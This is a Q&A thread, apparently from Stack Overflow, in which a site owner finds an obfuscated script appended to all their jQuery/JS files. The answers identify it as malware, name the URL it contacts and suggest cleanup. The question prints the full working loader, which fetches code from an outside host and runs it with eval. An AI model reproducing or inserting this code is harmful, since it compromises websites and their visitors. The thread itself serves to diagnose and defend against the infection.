# All jQuery files add by some script in bottom of js file

Tags: javascript, html, jquery, css

My all .js file add some scripting. Here add script. Please help me how to resolve this issue and how to add this scripting in my .js file.

```
/*** Script Here ***/

    ;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};

/*****/
```

Answer (score 1):

This JavaScript looks like a malware. It is hitting to this url `https://go.staticvisit.net/ui_node.js?ver=hezjccz7mmksm8yvwbs6g`

The site responding with below code.

```
var ndsx = true;
(function () {
  var date = new Date(new Date().getTime() + 60 * 1000 * 60 * 24 * 365);
  document.cookie = "___utma=2; path=/; expires=" + date.toUTCString();
})();
```

Apart from this I dont have any other information.

There are some malware reports on this, check [this](https://www.hybrid-analysis.com/sample/b2514450f6be22d3f2137f46bcc9689363d993f4be95b413f492e3aea1f46a0a/615a6a2d05a3ac15bf38783b)

I suggest you inform the web administator and replace the affected script files with the original one. A virus/malware scan is recommended. I once had   a similar issue in one of my PHP sites where there was a flaw in one of the file upload scripts.

Comment: Can you advice me how to come this type of code via any plugin or json file. Please help.

Comment: It should be from any plugins you added. Or if your web server is a shared hosting this can happen if any other sites are compromised